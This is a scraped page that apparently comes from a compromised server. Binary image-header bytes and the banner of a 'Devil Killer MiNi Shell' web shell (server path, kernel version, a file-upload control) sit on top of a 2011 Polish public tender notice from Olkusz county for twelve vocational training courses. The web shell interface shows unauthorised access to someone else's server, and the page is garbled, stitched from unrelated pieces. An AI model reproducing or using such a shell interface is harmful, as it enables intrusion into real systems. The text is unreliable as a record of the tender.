JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111115/379110-N-2011.html

<p class="kh_header"><b>Olkusz: Organizacja i przeprowadzenie seminariów/kursów  dla uczestników projektu Modernizacja Kształcenia Zawodowego w Małopolsce</b><br>
<b>Numer ogłoszenia: 379110 - 2011; data zamieszczenia: 15.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu w Olkuszu , ul. Mickiewicza 2, 32-300 Olkusz, woj. małopolskie, tel. 032 6430414, 6476670, faks 032 6430490.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp.olkusz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie seminariów/kursów  dla uczestników projektu Modernizacja Kształcenia Zawodowego w Małopolsce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Organizacja i przeprowadzenie seminariów/kursów dla uczestników projektu Modernizacja Kształcenia Zawodowego w Małopolsce - Program Operacyjny Kapitał Ludzki Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działanie 9.2 Podniesienie atrakcyjności i jakości szkolenia zawodowego o następującej tematyce:
1.	Część I - Kurs florystyczny dostosowany do potrzeb młodzieży uczęszczającej do szkoły specjalnej
2.	Część II -  Degustacja Win
3.	Część III - Pierwsza pomoc
4.	Część IV - Operator koparko-ładowarki
5.	Część V - Kurs przygotowujący do egzaminu kwalifikacyjnego na uprawnienia E w zakresie Eksploatacji sieci i urządzeń elektroenergetycznych do 1kV i powyżej 
6.	Część VI -Prawo jazdy kat C
7.	Część VII - Systemy alarmowe
8.	Część VIII - Kurs małej księgowości i obsługi kasy fiskalnej
9.	Część IX - Kurs Języka Migowego
10.	Część X- Kurs kadry i płace + program /Symfonia/
11.	Część XI- Kurs wizażu
12.	Część XII- Kurs podstawy księgowania z umiejętnością obsługi  komputerowych programów księgowych.

Uczestnikami kursów będą uczniowie szkół zawodowych z terenu powiatu olkuskiego, będący jednocześnie uczestnikami projektu Modernizacja Kształcenia Zawodowego w Małopolsce. Zamawiający dopuszcza składanie ofert częściowych na jedną lub więcej z 12 części zamówienia wykazanych poniżej.


CZĘŚĆ I  Kurs florystyczny dostosowany do potrzeb młodzieży uczęszczającej do szkoły specjalnej
Liczba uczestników - 10
Kurs w wymiarze co najmniej 30 godzin

Program kursu powinien obejmować co najmniej zagadnienia:
1.	Narzędzia, materiały i techniki florystyczne
2.	Zasady postępowania z materiałem roślinnym
3.	Dekoracje wielkanocne
4.	Dekoracje wnętrz
5.	Kompozycje żałobne
6.	Florystyka ślubna

Metody pracy:
-zajęcia teoretyczne ograniczone do minimum
-ćwiczenia praktyczne

Miejsce realizacji: Zespół Szkół nr 5 w Olkuszu, ul. Kochanowskiego 2
Termin realizacji: od dnia podpisania umowy do 29.02.2012r.
Kurs zakończony egzaminem wewnętrznym. Po zaliczeniu egzaminu uczeń powinien otrzymać dyplom ukończenia kursu oraz zaświadczenie o ukończeniu kursu zgodne z Rozporządzenie z dnia 03 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności  i kwalifikacji zawodowych w formach pozaszkolnych - Dz. U. z 2006r. Nr 31, poz.216 z późniejszymi zmianami
Ilekroć w opisie czasu zajęć występuje słowo godzina, należy przez to rozumieć 50 minut zajęć  + 10 minut przerwy.
CZĘŚĆ II - Degustacja win
Liczba uczestników: 3 osoby

W związku z niewielką liczbą uczestników kursu, Zamawiający dopuszcza włączenie kursantów do grupy z poza niniejszego Zamówienia.

Seminarium w wymiarze co najmniej 15 godzin
Program kursu powinien obejmować co najmniej:
I - teoria 
1.	Słownictwo i pojęcia związane z winem
2.	Historia wina
3.	Regiony winiarskie i odmiany winorośli
4.	Klasyfikacja i typologia win
5.	Proces produkcji win
6.	Wprowadzenie do degustacji
7.	Zasady podawanie i doboru win do potraw
8.	Kupowanie, przechowywanie i podawanie win
9.	Praktyczne porady
II - panel degustacyjny
1.	Degustacja co najmniej 15 gatunków win

Wykonawca jest zobowiązany do zapewnienia każdemu uczestnikowi kursu książkę:
/Wino - kurs wiedzy/
Kevin Zraly
Wydawnictwo: Explanator , Listopad 2010 
która po zakończeniu kursu zostaną własnością kursanta.

Metody pracy:
-zajęcia teoretyczne
-zajęcia praktyczne

Termin realizacji: od dnia podpisania umowy do 09.12.2011r.
Ilekroć w opisie czasu zajęć występuje słowo godzina, należy przez to rozumieć 50 minut zajęć  + 10 minut przerwy
CZĘŚĆ III Pierwsza pomoc
Liczba uczestników: 10
Seminarium w wymiarze co najmniej 10 godzin
Program kursu powinien obejmować co najmniej:
2.	Prawne aspekty udzielania pierwszej pomocy,
3.	Standardy w ratownictwie medycznym i przedmedycznym,
-Wg Europejskiej Rady Resuscytacji,
-Wg Amerykańskiego Towarzystwa Kardiologii,
4.	Bezpieczeństwo ratownika,
5.	Bezpieczeństwo otoczenia,
6.	Środki ochrony własnej ratownika,
7.	Prawidłowe wezwanie pomocy,
8.	Reakcja organizmu na niedotlenienie,
9.	 /Łańcuch przeżycia/,
10.	Reguła ABC,
11.	Ocena stanu świadomości,
12.	Udrożnianie dróg oddechowych,
13.	Ocena oddychania, metoda WIDZĘ, SŁYSZĘ, CZUJĘ (pokaz na fantomie),
14.	Ocena stanu układu krążenia,
15.	Nieprzytomny - POZYCJA BOCZNA USTALONA (pokaz),
16.	Zatrzymanie oddechu (sztuczne oddychanie metodą usta-usta),
17.	Zatrzymanie krążenia i oddechu - dorośli,
18.	Prowadzenie resuscytacji krążeniowo-oddechowej przez jednego ratownika - ćwiczenia na fantomie,
19.	Prowadzenie resuscytacji krążeniowo-oddechowej przez dwóch ratowników - ćwiczenia na fantomie,
20.	Postępowanie w przypadku zachłyśnięcia ciałem obcym,
21.	Zasady bezpieczeństwa użycia AED (automatycznego defibrylatora zewnętrznego),
22.	Prowadzenie resuscytacji krążeniowo-oddechowej z użyciem AED,
23.	Wstrząs - definicja, objawy, postępowanie,
24.	Udzielanie pomocy w urazach,
25.	Nagłe stany zagrożenia życia,
26.	Pomoc dzieciom i niemowlętom.
 
Metody pracy:
-zajęcia teoretyczne
-zajęcia praktyczne
Termin realizacji: od dnia podpisania umowy do 09.12.2011r
Kurs zakończony egzaminem wewnętrznym. Po zaliczeniu egzaminu uczeń powinien otrzymać dyplom ukończenia kursu oraz zaświadczenie o ukończeniu kursu zgodne z Rozporządzenie z dnia 03 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności  i kwalifikacji zawodowych w formach pozaszkolnych - Dz. U. z 2006r. Nr 31, poz.216 z późniejszymi zmianami.
Ilekroć w opisie czasu zajęć występuje słowo godzina, należy przez to rozumieć 50 minut zajęć  + 10 minut przerwy
CZĘŚĆ IV Operator koparko-ładowarki klasy III
Liczba uczestników: 10 osób
Kurs w wymiarze co najmniej 202 godzin w tym: 116 godzin zajęć teoretycznych, 60 godzin praktycznych oraz 26 godzin stażu wstępnego
Kurs musi być przeprowadzony w oparciu o program zatwierdzony przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego oraz zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 20.09.2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. nr 118 z dnia 15.10.2001 r. poz. 1263). Kurs powinien przygotować uczestnika do podejścia do egzaminu zewnętrznego, którego pozytywny wynik skutkuje wydaniem książeczki operatora Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie.
Metody pracy:
-zajęcia teoretyczne
-zajęcia praktyczne  w wymiarze co najmniej 116 godzin
Termin realizacji:  od dnia podpisania umowy do 31 maja 2012
Wykonawca powinien wliczyć w cenę kursu cenę jednokrotnego podejścia uczestnika do egzaminu zewnętrznego.
Część V - Kurs przygotowujący do egzaminu kwalifikacyjnego na uprawnienia E w zakresie Eksploatacji sieci i urządzeń elektroenergetycznych do 1kV i powyżej
Liczba uczestników:  20 osób
Kurs w wymiarze co najmniej 45 godzin

Zakres tematyczny szkolenia obejmuje co najmniej  następujące zagadnienia: 
1.	obowiązujące przepisy w zakresie eksploatacji urządzeń i instalacji elektroenergetycznych do 1 kV, 
2.	bhp, organizację pracy, ochronę przeciwporażeniową,
3.	ratownictwo,
4.	instalacje elektroenergetyczne i zabezpieczenia do 1 kV,
5.	urządzenia oświetlenia elektrycznego wewnętrznego,
6.	elektryczne urządzenia napędowe, prostowniki i akumulatory, rozdzielnice.

Termin realizacji: od dnia podpisania umowy do 29.02.2012r.
Wykonawca powinien wliczyć w cenę kursu cenę jednokrotnego podejścia uczestnika do egzaminu zewnętrznego.
CZĘŚĆ VI  Kurs prawa jazdy kat. C
Liczba uczestników: 10
Kurs w wymiarze co najmniej 50 godzin (20 teoria, 30 praktyka)
Metody pracy:
-zajęcia teoretyczne
-zajęcia praktyczne
Termin realizacji: od dnia podpisania umowy do 30 kwietnia 2012
Wykonawca powinien wliczyć w cenę kursu cenę jednokrotnego podejścia uczestnika do egzaminu zewnętrznego.
Część VII - Systemy alarmowe
Liczba uczestników: 12
Kurs w zakresie co najmniej 36 godzin

Tematyka kursu:
1.	Omówienie cech i zasad działania systemów alarmowych. 
2.	Zasady projektowania systemów alarmowych. 
3.	Zapoznanie teoretyczne z centralami z serii Integra. 
4.	Zajęcia praktyczne związane z centralami Integra. 
5.	Zapoznanie teoretyczne z urządzeniami współpracującymi z Integrą. 
6.	Zajęcia praktyczne związane z modułami współpracującymi z Integra. 
a.      Moduły przewodowe rozszerzające wejścia i wyjścia. 
b.     Moduły bezprzewodowe. 
c.      Wizualizacja stanów systemu alarmowego
7.	Ćwiczenia praktyczne z programowania central, 
8.	Zapoznanie się z możliwościami komunikacyjnymi Integry ( linia telefoniczna , gsm, sieć TCP/IP), 
9.	Zajęcia praktyczne związane z możliwościami komunikacyjnymi, 
10.	Teoretyczne i praktyczne zajęcia z zakresu powiadamiania i monitorowania, 
11.	Projektowanie systemu alarmowego, 
12.	Praktyczne wykonanie zaprojektowanego systemu, 
13.	Zagadnienia marketingowo-handlowe w zakresie obsługi klienta 

Termin realizacji: od dnia podpisania umowy do 31.01.2012r.

Kurs zakończony egzaminem wewnętrznym. Po zaliczeniu egzaminu uczeń powinien otrzymać dyplom ukończenia kursu oraz zaświadczenie o ukończeniu kursu zgodne z Rozporządzenie z dnia 03 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności  i kwalifikacji zawodowych w formach pozaszkolnych - Dz. U. z 2006r. Nr 31, poz.216 z późniejszymi zmianami

Część VIII - Kurs małej księgowości i obsługi kasy fiskalnej 
Liczba uczestników: 18 osób w co najmniej dwóch grupach.
Kurs w zakresie co najmniej 40 godzin
Tematyka kursu:
1.	Podstawy prawne i zasady prowadzenia rachunkowości w małych i średnich przedsiębiorstwach,
2.	Zasady sporządzania, obiegu, kontroli i przechowywania dowodów księgowych w małych i średnich przedsiębiorstwach,
3.	Zasady opodatkowania MiSP
4.	Uproszczone formy ewidencji księgowej,
5.	Zasady prowadzenia podatkowej księgi przychodów i rozchodów,
6.	dokumentowanie zdarzeń gospodarczych z użyciem programów komputerowych - operacje związane z obrotem pieniężnym, zakupem, sprzedażą, kosztami,
7.	Prowadzenie różnych kartotek z wykorzystaniem  programów komputerowych
8.	Ewidencja środków trwałych u podatników prowadzących PKPiR z wykorzystaniem programów komputerowych,
9.	Dokumentacja rozrachunków z tytułu wynagrodzeń z wykorzystaniem programów komputerowych,
10.	Prowadzenie uproszczonych form ewidencji księgowej z użyciem programów komputerowych,
11.	Rozrachunki przedsiębiorstwa z ZUS za pośrednictwem programu /PŁATNIK/,
12.	Rozrachunki przedsiębiorstwa z Urzędem Skarbowym,
13.	Obsługa kas fiskalnych różnych typów,
14.	Obsługa terminali kart płatniczych.

Termin realizacji: od dnia podpisania umowy do 29.02.2012r.

Kurs zakończony egzaminem wewnętrznym. Po zaliczeniu egzaminu uczeń powinien otrzymać dyplom ukończenia kursu oraz zaświadczenie o ukończeniu kursu zgodne z Rozporządzenie z dnia 03 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności  i kwalifikacji zawodowych w formach pozaszkolnych - Dz. U. z 2006r. Nr 31, poz.216 z późniejszymi zmianami.

Część IX- Kurs języka migowego 
Liczba uczestników: 6
Kurs w zakresie co najmniej 60 godzin
Tematyka kursu:	
1.	Podstawy problematyki środowiska osób niesłyszących i ich potrzeb ze szczególnym uwzględnieniem sytuacji społecznej.
2.	Podstawy wiedzy o języku migowym i jego zastosowaniach w komunikacji z niesłyszącymi.
3.	Nabycie praktycznych umiejętności w posługiwaniu się polskim alfabetem palcowym oraz podstawowymi liczebnikami głównymi i porządkowymi.
4.	Poznanie co najmniej 400 podstawowych znaków pojęciowych języka migowego oraz technikę ich używania zgodnie z zasadami, zarówno Systemu Językowo-Migowego (SJM) jak też Polskiego Języka Migowego (PJM) w tym opanowanie słownictwa z zakresu turystyki i rekreacji.
5.	Rozumienie wypowiedzi sformułowanych w języku migowym

Termin realizacji: od dnia podpisania umowy do 30.04.2012r.
 
Kurs języka migowego musi się zakończyć egzaminem wewnętrznym przeprowadzonym przez komisję w skład której wchodzą wykładowcy języka migowego oraz co najmniej jeden przedstawiciel Polskiego Związku Głuchych. Uczestnicy kursu otrzymują zaświadczenie wydane przez  Polski Związek Głuchych potwierdzające uczestnictwo w kursie oraz certyfikat z wpisaną oceną końcową, po zdanym egzaminie.

Część X- Kurs kadry i płace + program /Symfonia/
Liczba uczestników: 6
Kurs w wymiarze co najmniej 60 godzin
Tematyka kursu:
1.	Prawo pracy (rodzaje umów o pracę, wynagrodzenie, czas pracy, odpowiedzialność materialna, urlopy, przepisy bezpieczeństwa i higieny pracy, akta personalne, prowadzenie dokumentacji pracowniczej),
2.	Ubezpieczenia społeczne - rozliczenia z ZUS (podleganie ubezpieczeniom, zgłaszanie płatników i ubezpieczonych, składki: podstawa i zasady ustalania, terminy i formy płatności, dokumenty rozliczeniowe, zasiłki z ubezpieczenia społecznego, kapitał początkowy,
3.	Prawo podatkowe (podatek dochodowy od osób fizycznych-obowiązki zakładu pracy jako płatnika),
4.	Odpowiedzialność pracownika (kodeks cywilny, kodeks pracy, kodeks karny- przepisy szczegółowe),
5.	Archiwizacja dokumentów,
6.	Obsługa programów komputerowych wspomagających pracę działów kadrowo - płacowych (płatnik, programy kadrowo - płacowe: Logotech AA, Comarch, Symfonia, Rakssol, Vulkan).

Termin realizacji: od dnia podpisania umowy do 30.04.2012r.

Kurs zakończony egzaminem wewnętrznym. Po zaliczeniu egzaminu uczeń powinien otrzymać dyplom ukończenia kursu oraz zaświadczenie o ukończeniu kursu zgodne z Rozporządzenie z dnia 03 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności  i kwalifikacji zawodowych w formach pozaszkolnych - Dz. U. z 2006r. Nr 31, poz.216 z późniejszymi zmianami.

Część XI- Kurs wizażu
Liczba uczestników: 8
Kurs w wymiarze co najmniej 40 godzin
Tematyka kursu:
1.	stanowisko pracy, przybory i kuferek wizażysty
2.	charakterystyka kosmetyków do wizażu
3.	zasady dezynfekcji, czyszczenia i pielęgnacji oraz przechowywania akcesoriów wizażysty
4.	zasady higieny miejsca pracy wizażysty
5.	rodzaje oświetlenia w pracy wizażysty
6.	przygotowanie twarzy modelki do makijażu, pielęgnacja, masaż relaksacyjny, oczyszczanie twarzy, zmywanie i techniki usuwania makijażu
7.	analiza kolorystyczna, oddziaływanie barw, podział na cieple i zimne typy urody 
8.	charakterystyka i kształty twarzy, modelowanie twarzy różnymi technikami, techniki światłocienia
9.	makijaż korekcyjny i techniki kamuflażu
10.	korekta brwi - nadawanie odpowiedniej linii w zależności od kształtu twarzy
11.	korekta oczu, rodzaj i kształt - kreska, cieniowanie, eye liner, techniki malowania rzęs 
12.	korekta ust - powiększanie, zmniejszanie, wyrównanie
13.	korekta niedoskonałości twarzy - przebarwienia, pękające naczynka, cienie pod oczami, zmarszczki 
14.	makijaż dzienny dostosowywany do wykonywanego zawodu i osobowości
15.	makijaż wieczorowy - wersja matowa i błyszcząca 
16.	makijaż do okularów - dla krótkowidza i dalekowidza
17.	makijaż opadającej powieki
18.	makijaż synchroniczny
19.	makijaż ślubny i pełna stylizacja ślubna
20.	makijaż fotograficzny
21.	makijaż do zdjęć kolorowych i czarno-białych
22.	techniki doklejania ozdób do twarzy: sztuczne rzęsy, cyrkonie, brokaty, piórka i inne. 
Termin realizacji: od dnia podpisania umowy do 29.02.2012r.

Kurs zakończony egzaminem wewnętrznym. Po zaliczeniu egzaminu uczeń powinien otrzymać dyplom ukończenia kursu oraz zaświadczenie o ukończeniu kursu zgodne z Rozporządzenie z dnia 03 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności  i kwalifikacji zawodowych w formach pozaszkolnych - Dz. U. z 2006r. Nr 31, poz.216 z późniejszymi zmianami.

Część XII- Kurs podstawy księgowania z umiejętnością obsługi  komputerowych programów księgowych.
Liczba uczestników: 12
Kurs w wymiarze co najmniej 60 godzin
Tematyka kursu:
1.	Podstawy księgowości:
-Podstawy prawne i zasady prowadzenia rachunkowości,
-Dokumentacja przyjętych zasad prowadzenia rachunkowości,
-Podstawowe zasady otwierania, prowadzenia i zamykania ksiąg rachunkowych.
2.	Obsługa programów /Rachmistrz/, /Subiekt/ /Rewizor/,
3.	Obsługa program /Płatnik/.

Termin realizacji: od dnia podpisania umowy do 31.03.2012r.

Kurs zakończony egzaminem wewnętrznym. Po zaliczeniu egzaminu uczeń powinien otrzymać dyplom ukończenia kursu oraz zaświadczenie o ukończeniu kursu zgodne z Rozporządzenie z dnia 03 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności  i kwalifikacji zawodowych w formach pozaszkolnych - Dz. U. z 2006r. Nr 31, poz.216 z późniejszymi zmianami.

WYKONAWCA ZOBOWIĄZANY JEST ZAPEWNIĆ (dotyczy wszystkich części zamówienia)
-Wykonawca zapewni w trakcie trwania szkolenia warunki pracy zgodne z przepisami bezpieczeństwa i higieny pracy oraz jeżeli to konieczne odzież ochronną i sprzęt ochronny. Wykonawca musi dla każdego uczestnika kursu zagwarantować miejsce siedzące (stolik/ławkę bądź krzesło z przystawką) umożliwiające swobodne sporządzanie notatek. 
-W przypadku kursów z obsługą programów komputerowych wykonawca musi zapewnić każdemu uczestnikowi stanowisko komputerowe wraz ze sprzętem i oprogramowaniem niezbędnym do przeprowadzenia kursu.
-Wykonawca zapewni każdemu uczestnikowi pakiet materiałów szkoleniowych.
-Jeżeli kurs odbywa się w miejscu wskazanym przez Zamawiającego to Zamawiający odpowiedzialny jest za wskazanie lokalizacji zgodnej z przepisami bezpieczeństwa                           i higieny pracy.
-Wykonawca w pierwszym dniu, przed rozpoczęciem kursu jest zobowiązany zapoznać uczestników z jego szczegółowym programem oraz przekazać im harmonogram realizowanych zajęć. Wykonawca zapewni każdemu uczestnikowi kursu materiały szkoleniowe na zajęcia praktyczne i teoretyczne, materiały piśmiennicze potrzebne do prowadzenia notatek (notatnik, długopis).
-Wykonawca zobowiązuje się do prowadzenia dokumentacji przebiegu kursu stanowiącej: 
-dziennik zajęć edukacyjnych zawierający wymiar godzin i tematy zajęć edukacyjnych,
-listę obecności 
-protokół z przebiegu egzaminu wewnętrznego oraz zewnętrznego, jeśli został przeprowadzony, 
-imienny wykaz osób, które ukończyły kurs, nie ukończyły kursu, nie zdały egzaminu, bądź nie przystąpiły do egzaminu,
-rejestr wydanych zaświadczeń potwierdzających ukończenie kursu i uzyskanie kwalifikacji.  
-dokumentacja zdjęciowa obejmująca co najmniej 10 różnych zdjęć
-Wzory dokumentów zostaną przekazane Wykonawcy najpóźniej w dniu podpisania umowy.
-Po zakończeniu kursu Wykonawca przekazuje Zamawiającemu oryginały ww. dokumentów oraz dokumentację fotograficzną na nośniku (płyta CD, DVD).
-Wykonawca zapewni w cenie kursu kawę, herbatę, wodę, susz konferencyjny, a w przypadku zajęć trwających dłużej niż 5 godzin, Wykonawca zapewni 1 gorący posiłek (catering) dla uczestników projektu. 
-Zaleca się aby kursy były przeprowadzone na terenie Gminy Olkusz. Dopuszcza się jednak możliwość przeprowadzenia zajęć teoretycznych i praktycznych poza Gminą Olkusz na terenie województwa małopolskiego lub województwa śląskiego, z tym że odległość z miejscowości, gdzie będą prowadzone kursy do miejscowości będącej siedzibą Zamawiającego nie może przekroczyć 50 km. W przypadku, gdy kurs odbywać się będzie poza terenem Gminy Olkusz, Wykonawca pokrywa koszty transportu uczestników, dodatkowo w przypadku grup równych bądź większych niż 10 osób odpowiada również za organizację transportu oraz opiekę w czasie przejazdu.
-Wykonawca zapewni nadzór wewnętrzny i wskaże w miejscu szkolenia osobę odpowiedzialną za obsługę szkolenia i kontaktu z uczestnikami szkolenia oraz Zamawiającym.
-Wykonawca zobowiązany jest do indywidualizacji kształcenia poprzez prowadzenie stałej oceny postępów poszczególnych uczestników szkolenia i zwiększenia pomocy wobec osób napotykających trudności w procesie nauczania.
-Przy kursach i szkoleniach tego wymagających, Wykonawca uwzględni w cenie  opłacenie 
1 egzaminu wewnętrznego oraz zewnętrznego, jeśli taki jest przewidziany, a także pozostałe koszty organizacyjne.
-Wykonawca dokona ubezpieczenia NW uczestnika kursu, w przypadku gdy będzie to konieczne. W szczególności uczestników kursu Operatora koparko-ładowarki, który powinien być ubezpieczony na kwotę co najmniej 10.000,00 zł.
-Wydane certyfikaty oraz zaświadczenia muszą zawierać logotypy zgodnie z aktualnymi wytycznymi oraz informację, że projekt jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego (nie dotyczy certyfikatów   zaświadczeń, których wzory zostały określone odpowiednimi przepisami). Wykonawca przekaże Zamawiającemu kserokopie wydanych dokumentów wraz z potwierdzeniem ich odbioru do siedziby Biura ds. realizacji projektu Modernizacja Kształcenia Zawodowego w Małopolsce w Olkuszu,                     w terminie 7 dni od daty ich wydania uczestnikom kursów zawodowych.
-Dane osobowe niezbędne do wydania zaświadczeń lub certyfikatów Wykonawca pozyskuje we własnym zakresie.
-Zamawiający zastrzega sobie możliwość prowadzenia bieżącego nadzoru nad procesem szkolenia uczestników projektu, na każdym jego etapie wraz z udziałem w ocenach częściowych i ocenie końcowej uczestników kursu oraz kontroli frekwencji kierowanych przez Zamawiającego uczestników kursu na zajęciach. 
-Wykonawca zobowiązuje się przedstawić w siedzibie Biura ds. realizacji projektu /Modernizacja Kształcenia Zawodowego w Małopolsce/ w Olkuszu, nie później niż do 4 dnia roboczego każdego miesiąca, uwierzytelnionych kopii list obecności uczestników zajęć za miesiąc poprzedni, potwierdzonych własnoręcznym podpisem osób skierowanych na kurs oraz podpisem osoby prowadzącej kurs.
-Wykonawca zobowiązuje się do bieżącego informowania Zamawiającego (najpóźniej w ciągu 3 dni) o każdej nieobecności uczestnika na kursie.
-Wykonawca zawiadomi Zamawiającego o terminie i godzinie egzaminu wewnętrznego i egzaminu zewnętrznego. 
